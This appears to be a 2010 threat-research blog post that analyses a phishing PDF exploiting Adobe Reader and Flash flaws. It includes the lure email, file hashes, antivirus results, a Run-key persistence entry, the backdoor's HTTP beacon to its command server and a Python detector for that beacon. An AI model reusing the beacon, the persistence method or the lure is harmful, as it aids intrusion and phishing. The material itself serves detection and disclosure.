Wednesday, November 10, 2010

CVE-2010-3654 Adobe Reader 0 day + CVE-2010-2883 Flash 10.1.102.64 + Reader 9.4.0.195 PDF Federal Benefits

Common Vulnerabilities and Exposures (CVE) numbers

CVE-2010-3654 Adobe Flash Player 10.1.85.3 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.95.2 and earlier on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.

CVE-2010-2883 Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information. 

Post Updates

Update 6, Nov 16 2010-------------------------------------------------------------------------------------------
After yesterday's tweets (snowfl0w and sempersecurus), GoDaddy took notice and suspended the mysundayparty.com domain.
Here is the email:
---------- Forwarded message ----------
From: GoDaddy Abuse Department
Date: Tue, Nov 16, 2010 at 11:16 AM
Subject: RE: reminder - mysundayparty.com complaint
To: Mila

Dear Mila Parkour,

Thank you for bringing this situation to our attention. We have gone
ahead and suspended the domain name in question.
Please let us know if you find any other domain names connected to C&C
servers or other malware distribution.
Regards,
Joe
GoDaddy.com
Spam and Abuse Department
24/7 Abuse Department Hotline: 480-624-2505
ARID1003
Here is the current Whois:
Registrant:
debby ryan
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
China

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MYSUNDAYPARTY.COM
Created on: 15-Sep-10
Expires on: 15-Sep-11
Last Updated on: 15-Sep-10

Administrative Contact:
ryan, debby g.debbei_@yahoo.com
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
China
+86.9801455 Fax --

Technical Contact:
ryan, debby g.debbei_@yahoo.com
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
China
+86.9801455 Fax --

Domain servers in listed order:
NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM

Update 5, Nov 15 2010-------------------------------------------------------------------------------------------
The mysundayparty.com domain is still active. Resent the message below to abuse@godaddy.com.
24.248.182.214  
Hostname:    wsip-24-248-182-214.ph.ph.cox.net  - Is it C&C or someone's sinkhole? Anybody?


Update 4, Nov 13 2010-------------------------------------------------------------------------------------------
mysundayparty.com domain is still active
The message that was sent to the GoDaddy abuse department on Nov 10, 2010 read:
Dear GoDaddy Abuse Department,
mysundayparty.com has been C&C for 0-day malware and used in targeted attacks described above.
Please take action asap.
Thanks
Update 3 Nov 11, 2010-------------------------------------------------------------------------------------------
Nov 10, 2010
GoDaddy Abuse dept was contacted via email on Nov 10 with the request to take action and suspend mysundayparty.com - used as C&C in the following 0day Adobe attacks for 3 months in a row:
mysundayparty.com
has been C&C for 0-days malware
Nov 11, 2010 mysundayparty.com is still active


Update 2 Nov 10, 2010----------------------------------------------------------------------------
from Brad Arkin Senior Director, Product Security & Privacy for Adobe Systems:
@bradarkin  
an update for adobe reader will be released next week to address cve-2010-3654. 9.4.0 is vulnerable.

@jduck1337
Re: http://contagiodump.blogspot.com/2010/11/cve-2010-3654.html - Adobe Reader bundles its own version of Flash. It is not updated
 

Update 1 Nov 10, 2010-----------------------------------------------------------------------------
Screenshot made today, November 10, 2010

I thought this Security update available for Adobe Flash Player (November 4, 2010), with the new Flash 10.1.102.64, would fix the problem.

General File Information

File: Open Season Announcements.pdf
MD5: d143a09611c45ac34ff0f85cc5efcc2e
SHA1: a2378a47bf084a155974b6fd20559732ecac1608
File size: 111729 bytes
Type: PDF
Distribution: Email attachment


Original Message

From: usajobs@opm.gov [mailto:usaj0bs@yahoo.com]
Sent: Wednesday, November 10, 2010 7:33 AM
To: XXXXXXXXXXXXX
Subject: Federal Benefits Open Season Begins On November 10

This is the time of year to ensure that you have the right health,
dental, or vision insurance coverage for you and your family. It is
also time for you to consider the out-of-pocket medical or dependent
care expenses you can save money on in 2011. The open season will run
November 10, 2010, through December 13, 2010. You should read the Open
Season Announcement (see the attached) thoroughly for important
information pertaining to each program.

The following three programs will be participating in this year's Open
Season for the 2011 plan year:
1.Federal Employees Health Benefits (FEHB) Program;
2.Federal Employees Dental and Vision Insurance Program (FEDVIP);
3.Flexible Spending Accounts (FSA) Program.

Please remember that there are no longer open seasons for the Thrift
Savings Plan (TSP). You may start, stop, or change your TSP
contributions at any time via myPay (DFAS), provided you are eligible
to participate in the TSP.

Message Headers

Received: from [173.245.79.62] by web120310.mail.ne1.yahoo.com via HTTP; Wed, 10 Nov 2010 04:32:55 PST
Date: Wed, 10 Nov 2010 04:32:55 -0800
From: "usajobs@opm.gov"
Reply-To: "usajobs@opm.gov"
To: XXXXXXXXXXXXXXXXXXXXXX
Message-ID: <855251712.57555.1289392517031.JavaMail.service@localhost>
Subject: Federal Benefits Open Season Begins On November 10
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_Part_57554_885518946.1289392517030"
Delivered-To: XXXXXXXXXXXXXXXX
Received-SPF: pass (google.com: best guess record for domain of usaj0bs@yahoo.com designates 98.138.91.66 as permitted sender) client-ip=98.138.91.66;
Authentication-Results: mx.google.com; spf=pass (google.com: best guess record for domain of usaj0bs@yahoo.com designates 98.138.91.66 as permitted sender) smtp.mail=usaj0bs@yahoo.com; dkim=pass (test mode) header.i=@yahoo.com
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 273636.18703.bm@omp1011.mail.ne1.yahoo.com
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1289392375; bh=JwcFHdceH3fqqdYHdMAn56STB43egwMkweBMk6XmrFs=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=5My/a8O9f9L1V7zXZkIRZ8IcN+UbseUxx50qRLsVsMra6zq7MWdmA0rcayL19usi2IVAdLJRJbgTrkAbXmc1Q4u/lCISSMj5D10t+/4BsqCDD0ZEdaoa4W4VDZNj92Nv7He1mXNCpv6NLF9+BQletQNYCCOqxCrB9DUZRW4xAUU=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type;
  b=urZU8LaQrCLdc7SpBI1+/aimAvIgh+XrG2TPLek1jcZfSbE68/rYw2Q5AjjBGLOK2UVPnqNfBAE6r4CbgaJisM74ZrKoCpPHx10fe4cvIkXi2sWiGEUcBudx15EaDgM6FnrWvFQhOo+RB/mTVmTohJvslG8XpmYT9/FSUQKnSyU=;
X-YMail-OSG: ZbW_TywVM1njbfFrytll2Be76lGDNQqcG_QM8kxiaDCEfzd
 mveVq3CVEal2XRvtmqUe3zVynkT8co6IVMltAhn6YPxXi4NCdR2.5BoOM3e8
 85ATkMtJHepUjLmAmzK5sSMs4zYJgeBBMcSu7FHDywJVLCSVVotqd6xgWBF6
 .6e_0QZCsvl8KRvPiRW_1azNLxSjwhpiX.H9AMA--
X-Mailer: YahooMailRC/504.5 YahooMailWebService/0.8.107.284920

Sender


Hostname:    173.245.79.62
ISP:    EGIHosting
Organization:    EGIHosting
Country:    United States
State/Region:    California
City:    Milpitas

Same ISP and IP range as posted earlier in http://contagiodump.blogspot.com/2010/10/potential-new-adobe-flash-player-zero.html

Automated Scans

File name: Open Season Announcements.pdf
http://www.virustotal.com/file-scan/report.html?id=d6c999e9279765f8924ed91422370193ea6ef856b2478513013bb3b75114f1c5-1289403795
Submission date: 2010-11-10 15:43:15 (UTC)
Result: 7/ 43 (16.3%)
AhnLab-V3 2010.11.10.02 2010.11.10 SWF/Cve-2010-3654
AntiVir 7.10.13.202 2010.11.10 EXP/CVE-2010-3654.A
DrWeb 5.0.2.03300 2010.11.10 Exploit.PDF.1641
Fortinet 4.2.249.0 2010.11.10 PDF/CoolType!exploit.CVE20102883
Kaspersky 7.0.0.125 2010.11.10 Exploit.Win32.CVE-2010-3654.a
Microsoft 1.6301 2010.11.10 Exploit:Win32/CVE-2010-2883.A
Sophos 4.59.0 2010.11.10 Mal/PDFJs-Z
MD5   : d143a09611c45ac34ff0f85cc5efcc2e
SHA1  : a2378a47bf084a155974b6fd20559732ecac1608

From Malware tracker (thank you)
http://www.malwaretracker.com/pdfsearch.php?hash=d143a09611c45ac34ff0f85cc5efcc2e
content/type: PDF document, version 1.6
Object 12.0 @ 1395: suspicious.flash Embedded Flash define obj
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 29.0 @ 102721: suspicious.string heap spray shellcode
Object 35.0 @ 5648: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 39.0 @ 8560: suspicious.obfuscation using substring
Object 39.0 @ 8560: suspicious.obfuscation using String.replace
Object 49.0 @ 15067: suspicious.flash Adobe Shockwave Flash in a PDF define obj type
Object 50.0 @ 15464: suspicious.flash Embedded Flash
Object 50.0 @ 15464: flash.exploit CVE-2010-3654
Object 56.0 @ 12318: suspicious.obfuscation using unescape



Files Created
Decoy file
%Temp%\Open Season Announcements.pdf
http://www.virustotal.com/file-scan/report.html?id=72b3342ad2132931d8e6524ef11b9e36b05c90cf707346c05acd01b801b28e0b-1289423081
0/42 
MD5   : db1991c1120c3f75991cbe91c2649ad3

\Local Settings\adobeupdate.exe
http://www.virustotal.com/file-scan/report.html?id=590bdc2952e54739d2d3b0a692691d7ec6f7489a7944a9798feaa513c07aa91e-1289418563
File name:adobeupdate.exe
Submission date:2010-11-10 19:49:23 (UTC)
Result:15/ 43 (34.9%)
AntiVir    7.10.13.204    2010.11.10    TR/Dropper.Gen
Authentium    5.2.0.5    2010.11.10    W32/Heuristic-257!Eldorado
BitDefender    7.2    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
DrWeb    5.0.2.03300    2010.11.10    BACKDOOR.Trojan
F-Prot    4.6.2.117    2010.11.10    W32/Heuristic-257!Eldorado
F-Secure    9.0.16160.0    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
GData    21    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
K7AntiVirus    9.67.2940    2010.11.09    Riskware
Kaspersky    7.0.0.125    2010.11.10    Heur.Invader
McAfee-GW-Edition    2010.1C    2010.11.10    Heuristic.BehavesLike.Win32.Trojan.H
Microsoft    1.6301    2010.11.10    Trojan:Win32/Wisp.A
NOD32    5608    2010.11.10    probably a variant of Win32/Wisp.A
Panda    10.0.2.7    2010.11.10    Suspicious file
Sophos    4.59.0    2010.11.10    Mal/Mdrop-B
VBA32    3.12.14.1    2010.11.09    suspected of Win32.Trojan.Downloader
MD5   : 27ba4695567a60f25a32bab240b3b832
SHA1  : 8f9e5aee02a4b340faae1a8057db419a34ace951
SHA256: 590bdc2952e54739d2d3b0a692691d7ec6f7489a7944a9798feaa513c07aa91e
ssdeep: 768:OpUElc+SsQvCXVD/5HiS/LcMRt50fQtW96VTD+eXrAyb:ZEUS3H3H750fQOQAw
File size : 37376 bytes

threatexpert
http://www.threatexpert.com/report.aspx?md5=27ba4695567a60f25a32bab240b3b832

    * The newly created Registry Value is:
          [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
          start = "%UserProfile%\LOCALS~1\adobeupdate.exe -installkys"
      so that adobeupdate.exe runs every time Windows starts
    * Analysis of the file resources indicates the following possible country of origin: China

Sykipot exploits an Adobe Flash Zero-Day (Kaspersky, www.securelist.com)
Read the full analysis at the link above. This is an excerpt:
When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built-in uninstall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.
The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.
The injected code will send an HTTP request to news.mysundayparty.com every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. 
Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.
A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the prefix '-nsunday' and is quite unique. Also note the Referer field, which is always set to http://www.yahoo.com/, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.
GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-192.168.0.1-nsunday HTTP/1.1
Referer: http://www.yahoo.com/
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
Host: news.mysundayparty.com
Cache-Control: no-cache
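The Kaspersky excerpt above points out that the config-download request is distinctive enough to signature on. The following Python is an added example (not code from the post or from Kaspersky) of that detection logic: it parses raw HTTP request text, including the folded Accept header, and flags requests whose path is /asp/kys_allow_get.asp and whose hostname parameter carries the "HOST-IP-nsunday" shape, extracting the victim host name and IP that the malware embeds. The first sample request is the one quoted in the excerpt; the benign request and the second beacon (with a hyphenated host name) are constructed for the example, and the `match_sykipot_beacon` / `find_beacons` function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the request quoted in the Kaspersky excerpt.
BEACON_PATH = "/asp/kys_allow_get.asp"
BEACON_REFERER = "http://www.yahoo.com/"
# hostname parameter is "<windows host name>-<ip>-nsunday"; the host name may
# itself contain hyphens, so the greedy group backtracks to the last "-<ip>-".
HOSTNAME_RE = re.compile(r"^(?P<host>.+)-(?P<ip>\d{1,3}(?:\.\d{1,3}){3})-nsunday$")


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers).

    Header names are lower-cased. A line starting with whitespace is a folded
    continuation of the previous header (the Accept line in the sample wraps).
    """
    lines = [l.rstrip("\r") for l in raw.strip("\r\n").split("\n")]
    method, target, _version = lines[0].split(" ", 2)
    headers, last = {}, None
    for line in lines[1:]:
        if not line:
            break  # end of headers
        if line[0] in " \t" and last:
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return method, target, headers


def match_sykipot_beacon(raw):
    """Return a dict describing the beacon, or None if the request does not match."""
    method, target, headers = parse_request(raw)
    if method != "GET":
        return None
    parts = urlsplit(target)
    if parts.path.lower() != BEACON_PATH:
        return None
    params = parse_qs(parts.query)
    m = HOSTNAME_RE.match(params.get("hostname", [""])[0])
    if not m:
        return None
    accept = headers.get("accept", "")
    return {
        "victim_host": m.group("host"),
        "victim_ip": m.group("ip"),
        "config_name": params.get("name", [""])[0],
        "c2_host": headers.get("host", ""),
        # Secondary indicators from the excerpt; reported, not required, so a
        # variant that drops them is still caught by the path/hostname match.
        "referer_matches": headers.get("referer") == BEACON_REFERER,
        "accept_matches": "application/x-shockwave-flash" in accept and accept.endswith("*/*"),
    }


def find_beacons(requests):
    """Run the matcher over a batch of captured requests and keep the hits."""
    return [hit for hit in (match_sykipot_beacon(r) for r in requests) if hit]


# The request quoted in the excerpt above.
BEACON_REQUEST = (
    "GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-192.168.0.1-nsunday HTTP/1.1\r\n"
    "Referer: http://www.yahoo.com/\r\n"
    "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,\r\n"
    "  application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7\r\n"
    "Host: news.mysundayparty.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
# Constructed: a hyphenated host name and no Referer/Accept headers.
BEACON_REQUEST_HYPHENATED = (
    "GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=WS-FIN-02-10.1.2.3-nsunday HTTP/1.1\r\n"
    "Host: news.mysundayparty.com\r\n\r\n"
)
# Constructed: ordinary traffic that happens to share the Referer.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "Referer: http://www.yahoo.com/\r\nAccept: */*\r\n\r\n"
)

if __name__ == "__main__":
    for hit in find_beacons([BEACON_REQUEST, BENIGN_REQUEST, BEACON_REQUEST_HYPHENATED]):
        print(hit)
```

Keying the match on the path and the "-nsunday" host-name encoding, and only reporting the Referer and Accept values, keeps the signature tight while still surfacing the infected host name and internal IP for triage.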

Network activity

news.mysundayparty.com -
24.248.182.214  
Hostname:    wsip-24-248-182-214.ph.ph.cox.net
ISP:    Cox Communications
Organization:    Cox Communications
Country:    United States 
State/Region:    Arizona
City:    Peoria

Compare to the IPs for the same domain posted earlier: http://contagiodump.blogspot.com/2010/10/potential-new-adobe-flash-player-zero.html

Domain news.mysundayparty.com


Domain lookup (Base / Record / Name / IP / Reverse / Route / AS):

news.mysundayparty.com  A  24.248.182.214 (United States); reverse wsip-24-248-182-214.ph.ph.cox.net; route 24.248.176.0/20 (proxy-registered route object); AS6298 COX-PHX Cox Communications Inc.
mysundayparty.com  A  68.178.232.100 (United States); reverse (none); route 68.178.232.0/22; AS26496 PAH-INC Go Daddy Software, Inc.
ns-soa  ns09.domaincontrol.com (5 hours old)  216.69.185.5 (United States); route 216.69.185.0/24
ns  ns09.domaincontrol.com (5 hours old)  216.69.185.5 (United States)
ns  ns10.domaincontrol.com (9 days old, only in delegation)  208.109.255.5 (United States); route 208.109.255.0/24
mx 10  mailstore1.secureserver.net (10 hours old)  216.69.186.201 (United States); reverse m1pismtp01-v01.prod.mesa1.secureserver.net; route 216.69.184.0/22
mx 0  smtp.secureserver.net (13 hours old)  216.69.186.201 (United States)
